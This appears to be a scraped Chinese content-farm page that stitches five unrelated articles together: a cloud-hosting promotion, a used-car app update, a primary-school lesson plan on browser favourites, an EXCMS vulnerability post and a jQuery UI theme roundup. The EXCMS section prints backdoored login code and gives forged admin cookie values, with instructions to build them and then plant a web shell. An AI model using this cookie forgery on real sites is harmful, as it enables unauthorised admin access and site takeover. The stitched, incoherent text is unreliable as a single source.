61阅读

精彩不容错过-天翼云两周岁钜惠:三重惊喜不容错过

发布时间:2018-04-19 所属栏目:漏洞分析

一 : 天翼云两周岁钜惠:三重惊喜不容错过

极客网3月11日(北京) “两会”无疑是这些天最热门的话题,李克强总理避虚就实的政府工作报告已成为人们讨论的焦点,其中最让ICT人兴奋的是,“促进信息消费,加快发展第四代移动通信,大幅提高互联网网速,鼓励电子商务创新发展”等内容被列入2014政府工作重点。这些远大目标的实现,与强大的基础性云计算产品的支撑息息相关。这意味着,云计算产业将迎来又一波发展高潮。

作为云计算领域的国家队和产业链上游供应商,中国电信天翼云正用实际行动引领和推动着中国云主机的普及浪潮。3月30日,中国电信天翼云即将迎来两周岁!为了庆祝这一特别的日子,秉承与客户一起共成长的一贯理念,中国电信天翼云互联网门户(http://www.ctyun.cn)今日宣布,将推出一波前所未有的钜惠活动,祭出“升级费用减半”、“新购/续订买一送一”、“抽奖送惊喜”三重惊喜,大手笔打造天翼云主机马年促销的又一波高潮。

图1:天翼云两周岁,三重惊喜送不停

天翼云

钜惠第一波:老客户升级费用减半

本着与客户共同成长,让老用户享受到实实在在优惠的宗旨,天翼云特别第一波钜惠活动特别针对有业务扩展需求的老用户。根据天翼云官方消息,3月5日-3月10日,凡是运行天翼云主机的老客户都将享受升级费用减半的大力度优惠。具体来说,在这段时间内,用户升级云主机时,仅需支付主机服务期*(升级配置价格-原配置价格)*1/2的费用(升级到个别配置价格为6-7折)。花一半的钱,干翻倍的事,如此钜惠,实在是中小企业节约成本的不二选择,您还在等什么呢?

钜惠第二波:新购/续订买一送一

优惠了老客户,不忘新客户。3月11日-3月30日,天翼云第二波普惠活动让新老用客户都将享受两种形式的买一送一。选择一:想要续订主机的老客户,您可以选择时长买一送一的优惠活动,即续订6个月就能享受12个月的服务,续订一年就能使用两年,以此类推。选择二:不管您是新/老客户,在这期间订购主机,除了可以选择时长翻倍外,还可以选择主机台数买一送一,即可以花一台主机的钱,获得两台主机的使用权。两种形式,灵活选择,要时间还是空间,全凭您做主!花一半的钱,干双倍的事,还不赶快行动起来?

钜惠第三波:两周岁庆生大抽奖

3月30日,天翼云即将在广大客户的支持下迎来两周岁生日。本着扎根云端共成长,怀着感恩之心,天翼云邀请您一起见证这个特殊日子,享受特别的惊喜。在生日当天,凡在3月5日后下单支付的客户都可参加生日大抽奖。惊喜奖品High不停,神秘大奖等着您,小伙伴们快呼朋引伴来参与吧!

当前,国内云主机产品因其便捷易用和节约成本的优势越来越受到中小企业的推崇,但在鱼龙混杂的云计算市场如何选择一款安全、可靠、性价比高的云主机,则成为众多潜在用户的一大购买阻碍。天翼云服务基于中国电信遍布全国的云数据中心,向客户提供按需使用IT基础资源能力(计算、存储、网络等的)IT整体服务。相比其他云服务提供商,天翼云在安全性和可靠性上有独到之处--专业运营团队7*24小时服务、五星级IDC机房服务保障机制、定期远程和现场巡检等一系列配套专业服务更能确保客户业务使用的稳定性和安全性。

如果单纯从价格来看,天翼云并不是最便宜的产品,但从整体性价比来看,天翼云的竞争力却是其它商家无法比拟的。作为云主机(云计算)领域的国家队和产业链上游供应商,天翼云以其独一无二的优质资源,担负着引领和推动中国云计算市场普及的重任。天翼云一波又一波的钜惠活动,已经帮助很多中国企业将业务迁往云端。权威机构统计,目前中国70%的政企及行业客户正在使用中国电信提供的宽带及行业解决方案,这构成了电信云计算服务的客户基础。在此基础上,天翼云从产品、技术、价格、渠道、行业应用等多个维度,全面展开市场拓展活动,并赢得了百度、CCTV、搜狐等一大批优质客户的信任,截至目前,已有超过10000家客户在使用天翼云产品。

用心的朋友都知道,天翼云钜惠促销的时刻,都是入手云主机的好时刻。想要漫步云端的您,藉此三重钜惠活动机会,赶快携手天翼云步入云端吧!

二 : 精彩内容不间断 二手车App v3.3版发布

  [61阅读 本站动态]  万物复苏,春回大地,在这样万物欣欣向荣之际二手车App发布v3.3版本。本次版本增加二手车信息对比、新车配置信息等重点功能,再次为用户选购二手车提供强力支持。同时针对用户踊跃反馈的诸多优化建议对软件本身进行了多处的改进,更多的惊喜正等待您的发现,马上来更新吧,小伙伴们。

61阅读

  下载方式:

  iPhone版本:点击下载 点击下载

  Android版本:点击下载

  如果不能下载的用户,请复制以下链接至浏览器进行下载:

  iPhone下载:http://itunes.apple.com/cn/app/id455177952?mt=8

  Android下载:http://app.61k.com/download/usedcar.apk

   二维码扫描下载:

61阅读

  新版本更新说明(v3.3):

  1/新增车型对比功能,帮您快速发现优缺点。

  是好是坏比一比,真金不怕火来炼,货比三家,车型对比助您变成火眼金睛。

61阅读

  2/新增新车配置,车型参数一目了然。

  新车配置、二手车信息一个软件全搞定,反复切换软件的日子一去不复返了。

61阅读

  如果您在使用二手车App遇到任何问题或建议,可在客户端“设置”中选择“用户反馈”或在本帖中回复写下您的建议,我们尊重您的每一条反馈意见并及时给您回复。

  如果您觉得新版二手车App还不错,别忘了去App Store、安卓各大市场给写个好评吧~

三 : 彩网页不容错过

教材选自杭州市市编教材,教学内容面向的是四年级的学生,适用于网络知识教学。

一、教学策略

1.教与学的方法灵活多样

利用“创设情境法”引出“任务驱动法”,让学生带着一个个任务通过课堂讨论、相互合作、实际操作等方式,自我探索,自主学习,使学生在完成任务的过程中不知不觉实现知识的传递、迁移和融合。以任务驱动的方式查漏补缺,使教学内容合理流动,水到渠成。教学中,启发、诱导贯穿始终,充分调动学生的学习积极性,注意调节课堂教学气氛,使学生变被动学习为主动愉快的学习。

2.化单调为有趣

通过学生多种感官的参与和生动丰富的教学方式(看、听、做、说),调动小学生学习的兴趣,使学生从情感上乐于参与,产生乐学、爱学、主动去学的愿望,使单调的学习内容变得丰富生动。

3.学生的个体与整体发展

通过自我展示等激励手段培养学生自我探索、自主学习的能力和自我创新、团体协作的能力。

二、教学目标

1.知识与技能:正确使用ie“历史”和“收藏夹”的功能。

2.过程与方法:通过查阅书本和互相协作完成任务驱动。

3.情感态度与价值观:激发学生利用因特网探索新世界的兴趣;培养协作精神。

三、教学重点、难点

正确使用ie“历史”和“收藏夹”的功能

四、教学过程

(一)教学导入

(投影)同学们还认识这个网址吗?http://www.baidu.com(word文档中)

你用它做过什么?(下载音乐、游戏,搜索自己的名字,查阅资料等)(评价语言:是吗?真不错/你真厉害/你可以做我们班的网络搜索高手了……)

教师小结:从同学们的回答中,老师知道了同学们用百度来查找学习资料,休闲资料。

(3分钟)

今天老师给大家介绍百度的另外一个网站,和大家一起分享。http://maps.baidu.com(word文档中),m、a、p,map中文翻译是什么意思?那么你们猜猜看这个网站是用来做什么的?(评:同学们英语知识掌握的很好噢)

那它到底是不是用来搜索地图的呢?老师请同学们自己动脑筋探索,自己动手试试看。

现在请同学们来说说你对这个网站了解了多少?

可以找地图……。

那你们有没有去过什么地方?现在老师来采访一下。

是吗?你真厉害。一个人就去过了xx,那你能带大家去看看吗?请你给大家演示一下。其它同学要保持安静,听仔细。(评:谢谢你,真的很厉害哦)

这么精彩的网页我们当然不能错过了,今天我们就来学习第五课《精彩网页不容错过》。

今天老师就带大家一起去春游,从我们西湖小学到“万松书院”去游一游。(5分钟探索,1分钟回答)

(二)教学过程(3分钟)

1.我们在ie浏览器地址栏内输入……,请大家一起说www.baidu.com,效果如图1。

2.从西湖小学到万松书院去春游,首先当然是要找到出发地,哪里啊?

那么哪位同学勇敢地上来给大家找找我们的学校。

在搜索栏内输入关键词“杭州市西湖小学”,效果如图2。

3.鼠标左键单击效果图2右上角的“从这里出发”,效果如图3。

    

效果图3           效果图4

4.在图3中输入“万松书院”,效果如图4,先点击“确定”,再点击“公交换乘”或者“驾车路线”;(万松书院有个典故,同学们可以到百度上去查阅看看)

5.最终效果如图5。

我们认识了从西湖小学到万松书院的两条不同路径,分别是公交路线和自驾车路线。如果同学们想以后游玩杭城的景点,可以尝试用这个网址来搜索。可是问题也来了,时间久了,很可能会忘记这么好的一个网址,你们有没有什么好办法让电脑记住?

(三)教学实践

学生尝试用各种办法让电脑记住这个网址。(翻阅书本和互相协助完成)(3分钟)

设置主页或收藏夹

是的,ie浏览器就有这么一个功能,它可以把网址存储在电脑当中。哪位同学上来再操作一遍如何收藏网址?(很勇敢,也很聪明哦,能即学即勇了)

好,现在请同学们也用这个网址从西湖小学到杭城的某个景点观光,景点自己选。但事先一定要把这个网址给收藏好,不要忘记,请千万记住路自己经过的路线,不然就回不来了。并且要保持车内安静和整洁。

学生之间进行合作,交流,分享成果。

已经到达目的地的同学请举手,还没有到的同学请保持安静。我们听听看已经到的同学到哪里去过了?是坐公交车还是自己驾车的?为什么他们先到,你们还在路上?(黑屏,让其余学生无法操作)(这位同学很驾车技术很熟练,对路况也很熟悉。谢谢你)

汇报成果。(10分钟)

我们要记住经过的路线,其实电脑同样会记住刚才已经走过的路了。请同学们找找看ie浏览器里面有没有刚才我们用过的地址?

学生之间进行合作,交流,分享成果。(等待后如果还未果,提醒书本p19页有介绍的)学生查阅书本和互相协作完成任务。(5分钟)

对,非常聪明。ie不仅能记住今天用过的网址,还能记住几天甚至几周前用过的网址。(教师打开历史纪录)但是这个可能会设计到个人隐私,所以同学们请不要轻易察看别人的历史纪录。哪位同学上来再操作一遍如何打开“历史纪录”?(谢谢你,你真棒)

我们部分同学的车子比较慢,还没有到。那这样,没有到的同学继续前进,已经到的同学可以挑战一下自己,到杭城以外的地方去看看风景,把整个地图都熟悉一下,有没有问题?(5分钟)

(四)小结

新课我们就学到这里,我想听听同学们今天的收获:1.你学到了什么知识?2.你可以用这个网站做什么?

师小结:我们xx班的同学们真不错,个个都很聪明。今天我们不仅认识了百度的另外一个网站──“百度地图搜索”,而且还学会了如何正确使用“收藏夹”和“历史”功能。通过今天的学习,我们进一步感受到电脑的神奇和有趣,同时我们还借助电脑杭城的很多风景点进行了一次有趣的神游。其实,只要我们懂得电脑技术,更好地运用电脑,就可以为我们的学习和生活更好地服务!(3分钟)

四 : EXCMS 0day (过程精彩)

  以下版本没测试 测试的是最新版本

  在公布前几小时没有通知官方 ^_^ 哈哈

  为什么说过程精彩呢? 看完就明白!

  因为这个漏洞原因非一般! 同时映射出中国软件行业的悲哀!!!

  经典对白 看代码

  后台登录文件

  adminModulesAuthIndex.php

  

  if ( defined( "EXCMS" ) ) //在admin/index.php里有了 下面文件都是包含运行方式的

  {

  }

  if ( !defined( "EXCMS_ADMIN" ) )

  {

  exit( "Access Denied" );

  }

  $excms_action['title'] = "登录"; //标题

  $forward = $_GET['forward']; //登录后转跳的地方

  $verifycode = $EXCMS_CONFIG['login_verifycode']; //验证码。。。

  if ( $_POST['loginType'] != 1 && !empty( $_COOKIE['EXCMSADMIN'] ) )

  //迈下伏笔了!

  {

  $defaultBoxDisplay = "none";

  $BoxDisplay = "";

  $remeberInfo = explode( "&", $_COOKIE['EXCMSADMIN'] );

  //看到这里没? 神奇把?

  $remeberAdmin = $remeberInfo[0];

  $remeberPwd = $remeberInfo[1];

  //账号密码获取了(COOKIES方式?) 看下去将会发生的事情很惊天地!

  $pwdForever = strtoupper( md5( $remeberAdmin." love EXCMS forever" ) );

  //这就是中国特色! 作者 你知道良心2个字什么写吗? 你知道什么叫道德吗?

  $remeberPwd = $remeberPwd == $pwdForever ? true : false;

  $loginInputDispay = $remeberPwd ? "none" : "";

  $loginType = $remeberPwd ? 3 : 2;

  }

  else

  {

  $defaultBoxDisplay = "";

  $BoxDisplay = "none";

  $loginInputDispay = "none";

  $loginType = 1;

  }

  //下面是输出登录界面的

  然后是CheckLogin.php 验证登录文件

  经典对白 看代码!

  

  if ( defined( "EXCMS" ) )//index.php有了

  {

  }

  if ( !defined( "EXCMS_ADMIN" ) )

  {

  exit( "Access Denied" );

  }

  $excms_action['loadtpl'] = true;

  $adminname = trim( $param['adminname'] );

  $password = trim( $param['loginType'] == 2 ? $param['password1'] : $param['password'] );

  $rememberPwd = $param['loginType'] == 2 ? $param['savePwd'] : $param['rememberPwd'];

  $forward = $param['forward'];

  $login_fail = true;

  $error = "";

  //以上东西不用理 $param都是POST方式的

  if ( empty( $adminname ) )

  //检测账户是否为空

  {

  $error = getlangbyname( "EMPTY_ADMINNAME" );

  }

  else if ( $param['loginType'] != 3 && empty( $password ) )

  //检测这个什么东西 可能是步骤把 是否第3步和密码是否是空

  {

  $error = getlangbyname( "EMPTY_PASSWORD" );

  }

  else

  {

  if ( $param['loginType'] == 3 )

  {

  //以下内容绝非因失误做成的漏洞 以这个程序编写技术 没可能这样 可以找任何PHP高手鉴证

  $remeberInfo = explode( "&", $_COOKIE['EXCMSADMIN'] );

  $remeberAdmin = $remeberInfo[0];

  $remeberPwd = $remeberInfo[1];

  //账号密码从COOKIES里获取!

  $pwdForever = strtoupper( md5( $adminname." love EXCMS forever" ) );

  if ( $remeberPwd == $pwdForever )

  //COOKIES里的账号加密过程 比ESPCMS还简单~~

  {

  include_once( LIB_PATH."system/Admin.class.php" );

  $admin_obj = new Admin( );

  $admin = $admin_obj->getByAdminname( $adminname );

  //悲剧! 只验证了管理员账号 没有验证密码!!!

  if ( $admin )

  {

  $admin['acl'] = $admin_obj->getAdminACL( $admin['adminid'] );

  $_SESSION['admininfo'] = $admin;

  //获得管理员权限了!!!!!!!!!

  ++$_SESSION['admininfo']['logintimes'];

  $admin_obj->updateLastLogin( $admin['adminid'] );

  include_once( LIB_PATH."auth/Auth.class.php" );

  $auth = new Auth( );

  $auth->checkMenu( true );

  $excms_action['loadtpl'] = false;

  $login_fail = false;

  }

  }

  }

  else

  //跳过没有COKIES 下面就是真正的验证登录状态 请注意 是有验证密码的!

  {

  if ( $EXCMS['config']['login_verifycode'] )

  {

  $param['verifycode'] = trim( $param['verifycode'] );

  if ( $param['verifycode'] == "" )

  {

  $error = getlangbyname( "EMPTY_VERIFYCODE" );

  }

  else

  {

  include_once( LIB_PATH."util/CheckCode.class.php" );

  $checkcode = new CheckCode( );

  if ( !$checkcode->check( $param['verifycode'] ) )

  {

  $error = getlangbyname( "VERIFYCODE_FAILED" );

  }

  }

  }

  if ( empty( $error ) )

  {

  include_once( LIB_PATH."auth/Auth.class.php" );

  $auth = new Auth( );

  $loginMsg = $auth->Login( $adminname, $password );

  if ( $loginMsg['success'] )

  {

  $_SESSION['admininfo'] = $loginMsg['admininfo'];

  ++$_SESSION['admininfo']['logintimes'];

  $auth->checkMenu( true );

  if ( $rememberPwd == 1 )

  {

  $pwdForever = strtoupper( md5( $adminname." love EXCMS forever" ) );

  setcookie( "EXCMSADMIN", $adminname."&".$pwdForever, time( ) + 2592000 );

  }

  else if ( $param['loginType'] != 2 && $param['rememberMe'] == 1 )

  {

  setcookie( "EXCMSADMIN", $adminname, time( ) + 2592000 );

  }

  $login_fail = false;

  $excms_action['loadtpl'] = false;

  }

  else

  {

  $error = getlangbyname( $loginMsg['message'] );

  }

  }

  }

  }

  if ( !$login_fail )

  {

  if ( empty( $forward ) || strpos( $forward, "index.php?M=Auth" ) )

  {

  header( "Location:index.php", true );

  exit( );

  }

  header( "Location:".$forward, true );

  exit( );

  }

  $errorCls = "f";

  if ( $excms_action['loadtpl'] )

  {

  if ( !$error )

  {

  $error = getlangbyname( "LOGIN_FAILED" );

  }

  require( MODULES_PATH."Auth/Index.php" );

  }

  ?>

  //分析完毕

  最后给出EXP

  EXCMSADMIN=admin%26858A611C5651AC436D4450CE23A858D1;

  EXCMSADMIN=administrator%263E0331271F1133F9613BD49E7C4FB0CD;

  第1个是admin

  第2个是administrator 一般 就这2个 其他账号的话请自行结构

  结构方法 setcookie( "EXCMSADMIN", md5( 账号." love EXCMS forever" ) );

  然后 strtoupper一次 就是把字母都变大写

  修改COOKIES 直接进入后台 然后自定义页面 写入网马

  后语 这个COOKIES“漏洞”并非是记住管理登录状态

  记住管理登录的COOKIES是 SESSION ID 验证这个

  所以这个漏洞100%是作者留下的后门!

 

五 : 不容错过的精选免费jQuery UI主题大荟萃

  

不容错过的精选免费jQuery UI主题大荟萃

 

  jQuery UI是一套很流行的jQuery用 户界面组件的类库,它可以为你的网站提供很多UI小组件和界面主题。包含了日期选择器、滑块、手风琴模式、进度条和拖动框等几个部分组成,并以主题自定制 的模式方便大家使用。我们可以使用ThemeRoller,来自己自定义需要的主题。当然,缺省jQuery UI自带的主题是我们常常诟病的地方,如果你追求超棒UI视觉效果(类似Bootstrap或者Windows-Metro风格类似)的话,那么这篇文章 绝对是你不可错过的!

  jQuery UI Bootstrap

  

 

  这是一个专为Twitter Bootstrap迷们提供的超棒jQuery UI主题,可以帮助你用Bootstrap风格来美化界面和组件。

  Delta

  

 

  使用CSS3斜度并且支持Retina显示屏的 jQuery UI主题,在深色和轻量级背景下运行更加完美。

  jQUIT Builder (Windows Metro Style)

  

 

  这是一款真正为创建Windows Metro风格的jQuery UI主题。只需要选择颜色和内容就可以自动创建。

  Selene

  

 

  Selene是一款轻量级色彩并且包括所有jQuery UI工具风格的一个主题。

  Aristo

  

 

  这是一款jQuery UI卡布奇诺主题 ,全部为PSD文件格式并全部免费下载。

  Absolution

  

 

  这是一款看上去非常干净并且使用CSS3的jQuery Mobile-inspired主题。

  是不是很棒? 相信大家只需要以上面主题为基础,可以更容易的自己开发出更棒的jQuery UI主题。还等什么,下载吧!

  来源:不容错过的精选免费jQuery UI主题大荟萃GBin1.com

本文标题:精彩不容错过-天翼云两周岁钜惠:三重惊喜不容错过
本文地址: http://www.61k.com/1165292.html

61阅读| 精彩专题| 最新文章| 热门文章| 苏ICP备13036349号-1